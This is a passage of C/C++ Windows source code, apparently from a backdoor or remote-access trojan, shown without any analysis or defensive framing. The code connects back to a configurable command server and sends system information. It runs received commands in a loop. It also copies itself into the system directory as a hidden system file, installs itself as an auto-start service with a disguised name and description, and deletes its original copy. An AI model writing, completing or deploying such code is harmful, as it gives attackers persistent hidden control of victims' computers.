send(hSock,SendData.GetBuffer(0),SendData.GetLength()+1,0);
}
void _ConnectServer()
{
WSADATA Data;
WSAStartup(MAKEWORD(2, 1), &Data);
int num=0;
char buf[512];
memset(buf,0,512);
SOCKET sc;
SOCKADDR_IN saddr;
saddr.sin_family = AF_INET;
saddr.sin_port = htons(modify_data.port);
saddr.sin_addr.s_addr = inet_addr(modify_data.url);
if (saddr.sin_addr.s_addr == INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(modify_data.url)) != NULL)
{
memcpy(&(saddr.sin_addr), hp->h_addr, hp->h_length);
saddr.sin_family = hp->h_addrtype;
}
else
{
return;
}
}
if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR) return;
if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR) return;
_GetSysInfo(sc);
while(1)
{
fd_set FdRead;
FD_ZERO(&FdRead);
FD_SET(sc,&FdRead);
int Er=select(sc+1, &FdRead, NULL, NULL, NULL);
if((Er==SOCKET_ERROR) || (Er==0)) break;
if(FD_ISSET(sc,&FdRead))
{
num=recv(sc,buf,512,0);
if(num=0)
break;
if (_ExplainCmd(buf))
if (send(sc,"OK",2,0) == SOCKET_ERROR)
if(WSAGetLastError()!=WSAEWOULDBLOCK)
{
closesocket(sc);
return;
}
}
memset(buf,0,512);
Sleep(500);
}
closesocket(sc);
closesocket(sc);
return;
}
//以下是服务的外壳。不用管这么多。因为要写注释也不知道怎么写。格式是固定的
static SERVICE_STATUS srvStatus;
static SERVICE_STATUS_HANDLE hSrv;
static void __stdcall SvcCtrlFnct(DWORD CtrlCode)
{
switch(CtrlCode)
{
case SERVICE_CONTROL_STOP:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_STOPPED;
break;
case SERVICE_CONTROL_SHUTDOWN:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_STOPPED;
break;
case SERVICE_CONTROL_PAUSE:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_PAUSE_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_CONTINUE_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_RUNNING;
break;
}
SetServiceStatus(hSrv,&srvStatus);
}
static BOOL service_is_exist()
{
char SubKey[MAX_PATH]={0};
strcpy(SubKey,"SYSTEM\\CurrentControlSet\\Services\\");
strcat(SubKey,modify_data.ws_svcname);
HKEY hKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
return TRUE;
else
return FALSE;
}
static BOOL fDelete_Me=FALSE;
static void RunService(char *m_ServiceName,char *m_DisplayName,char *m_Description)
{
char FilePath[MAX_PATH];
GetModuleFileName(NULL,FilePath,MAX_PATH);
///*
char SystemPath[MAX_PATH];
GetSystemDirectory(SystemPath,MAX_PATH);
if (strncmp(SystemPath,FilePath,strlen(SystemPath)) != 0)
{
char FileTitle[80];
GetFileTitle(FilePath,FileTitle,80);
if (strstr(FileTitle,".exe") == NULL && strstr(FileTitle,".EXE") == NULL)
strcat(FileTitle,".exe");
strcat(SystemPath,"\\");
strcat(SystemPath,FileTitle);
CopyFile(FilePath,SystemPath,FALSE);
memset(FilePath,0,MAX_PATH);
strcpy(FilePath,SystemPath);
fDelete_Me = TRUE;
}
SetFileAttributes (FilePath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
//*/
char Desc[MAX_PATH];
HKEY key=NULL;
SC_HANDLE newService=NULL, scm=NULL;
__try
{
scm = OpenSCManager(0, 0,SC_MANAGER_ALL_ACCESS);
if (!scm)
__leave;
newService = CreateService(
scm, m_ServiceName,
m_DisplayName,
SERVICE_ALL_ACCESS|SERVICE_INTERACTIVE_PROCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
FilePath,
NULL, NULL, NULL, NULL, NULL);
if (newService == NULL)
{
if (GetLastError() == ERROR_SERVICE_EXISTS)
{
newService = OpenService(scm,m_ServiceName,SERVICE_ALL_ACCESS);
if (newService==NULL)
__leave;
else
StartService(newService,0, 0);
}
}
if (!StartService(newService,0, 0))
__leave;
strcpy(Desc,"SYSTEM\\CurrentControlSet\\Services\\");
strcat(Desc,m_ServiceName);
RegOpenKey(HKEY_LOCAL_MACHINE,Desc,&key);
RegSetValueEx(key,"Description",0,REG_SZ,(CONST BYTE*)m_Description,lstrlen(m_Description));
}
__finally
{
if (newService!=NULL)
CloseServiceHandle(newService);
if (scm!=NULL)
CloseServiceHandle(scm);
if (key!=NULL)
RegCloseKey(key);
}
}
void ServiceMain(DWORD dwargc,wchar_t* argv[])
{
hSrv=RegisterServiceCtrlHandler(modify_data.ws_svcname,SvcCtrlFnct);
srvStatus.dwServiceType=SERVICE_WIN32_SHARE_PROCESS;
srvStatus.dwControlsAccepted=SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;
srvStatus.dwWin32ExitCode=NO_ERROR;
srvStatus.dwWaitHint=2000;
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_START_PENDING;
SetServiceStatus(hSrv,&srvStatus);
srvStatus.dwCheckPoint=0;
Sleep(500);
srvStatus.dwCurrentState=SERVICE_RUNNING;
SetServiceStatus(hSrv,&srvStatus);
WSADATA Data;
WSAStartup(MAKEWORD(2, 2), &Data);
h[0]=NULL;
h[1]=NULL;
h[2]=NULL;
h[3]=NULL;
while(1)
{
StopFlag = 1;
_ConnectServer();
Sleep(3000);
}
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
SetServiceStatus(hSrv,&srvStatus);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_STOPPED;
SetServiceStatus(hSrv,&srvStatus);
return;
}
//
//
///
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
if (service_is_exist())
{
SERVICE_TABLE_ENTRY serviceTable[] =
{
{modify_data.ws_svcname,(LPSERVICE_MAIN_FUNCTION) ServiceMain},
{NULL,NULL}
};
StartServiceCtrlDispatcher(serviceTable);
}
else
{
RunService(modify_data.ws_svcname,modify_data.ws_svcdisplay ,modify_data.ws_svcdesc);
if (fDelete_Me)
{
_DeleteMe();
exit(0);
}
}
return 0;
}